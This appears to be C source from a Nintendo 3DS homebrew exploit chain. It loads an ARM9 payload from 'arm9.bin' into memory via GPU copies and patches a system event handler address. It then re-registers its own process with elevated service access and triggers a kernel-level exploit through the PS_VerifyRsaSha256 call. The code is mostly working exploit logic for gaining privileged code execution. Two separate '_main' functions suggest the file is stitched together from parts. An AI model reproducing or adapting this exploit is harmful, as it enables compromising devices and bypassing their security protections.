void _main(paramblk_t* p)
{
gspHeap = (u8*)p->linear_heap;
gspHeap_size = p->linear_size;
initSrv();
srv_RegisterClient(NULL);
gspGpuInit();
resetConsole();
print_str("hello\n");
print_str("_firm_appmemalloc "); print_hex((u32)_firm_appmemalloc); print_str("\n");
print_str("code address "); print_hex((u32)p->code_data); print_str("\n");
print_str("code size "); print_hex(p->code_size); print_str("\n");
setupStub((u8*)p->code_data);
Result ret = apply_map(&p->map, (u8*)p->code_data, HANS_LOADER_SIZE);
print_str("applied map "); print_hex(ret); print_str("\n");
ret = invalidateIcache(p->nssHandle);
ret = runStub(p->nssHandle, &p->map, (u8*)p->code_data);
print_hex(ret);
while(1);
gspGpuExit();
}
int __attribute__ ((section (".text.a11.entry"))) _main()
{
svc_sleepThread(0x10000000);
// Get framebuffer addresses
uint32_t regs[10];
regs[0] = 0xDEADBABE;
regs[1] = 0xBABEDADA;
//FIXME where do these reg addresses come from?
_GSPGPU_ReadHWRegs(gspHandle, 0x400468, ®s[0+2], 8); // framebuffer 1 top left & framebuffer 2 top left
_GSPGPU_ReadHWRegs(gspHandle, 0x400494, ®s[2+2], 8); // framebuffer 1 top right & framebuffer 2 top right
_GSPGPU_ReadHWRegs(gspHandle, 0x400568, ®s[4+2], 8); // framebuffer 1 bottom & framebuffer 2 bottom
_GSPGPU_ReadHWRegs(gspHandle, 0x400478, ®s[6+2], 4); // framebuffer select top
_GSPGPU_ReadHWRegs(gspHandle, 0x400578, ®s[7+2], 4); // framebuffer select bottom
//patch gsp event handler addr to kill gsp thread ASAP, PA 0x267CF418
*((u32*)(0x003F8418+0x10+4*0x4))=0x002CA520; //svc 0x9 addr
flashScreen();
svc_sleepThread(0x10000000);
// Read the main payload to 0x17F00000(0x23F00000 pa)
u32* buffer = (work_buffer + 0x10000/sizeof(u32));
IFILE file;
unsigned int readBytes;
_memset(&file, 0, sizeof(file));
IFile_Open(&file, L"dmc:/arm9.bin", 1);
const uint32_t block_size = 0x10000;
for(u32 i = 0; i < 0x20000u; i += block_size)
{
IFile_Read(&file, &readBytes, (void*)buffer, block_size);
GSPGPU_FlushDataCache(buffer, block_size);
GX_SetTextureCopy(buffer, (void *)(0x17F00000 + i), block_size, 0, 0, 0, 0, 8);
if(readBytes != block_size)
break;
}
// Copy the magic to 0x18410000
// Copy it twice to make it easier to find and avoid catching the wrong one
buffer[0] = MAGIC_WORD;
buffer[1] = MAGIC_WORD;
if(regs[6+2])
{
buffer[2] = regs[0+2];
buffer[3] = regs[2+2];
}
else
{
buffer[2] = regs[1+2];
buffer[3] = regs[3+2];
}
if(regs[7+2])
buffer[4] = regs[4+2];
else
buffer[4] = regs[5+2];
// Grab access to PS
Handle port;
svc_connectToPort(&port, "srv:pm");
srv_RegisterClient(&port);
u32 proc = 0;
svc_getProcessId(&proc, 0xFFFF8001);
srvUnregisterProcess(&port, proc);
srvRegisterProcess(&port, proc, 0x18, (const void*)&access_bin[0]);
Handle ps_handle = 0;
srv_getServiceHandle(&port, &ps_handle, "ps:ps");
svc_sleepThread(0x10000000);
// Perform the exploit
Result res = PS_VerifyRsaSha256(&ps_handle);
// We do not expect reaching here
return 0;
}
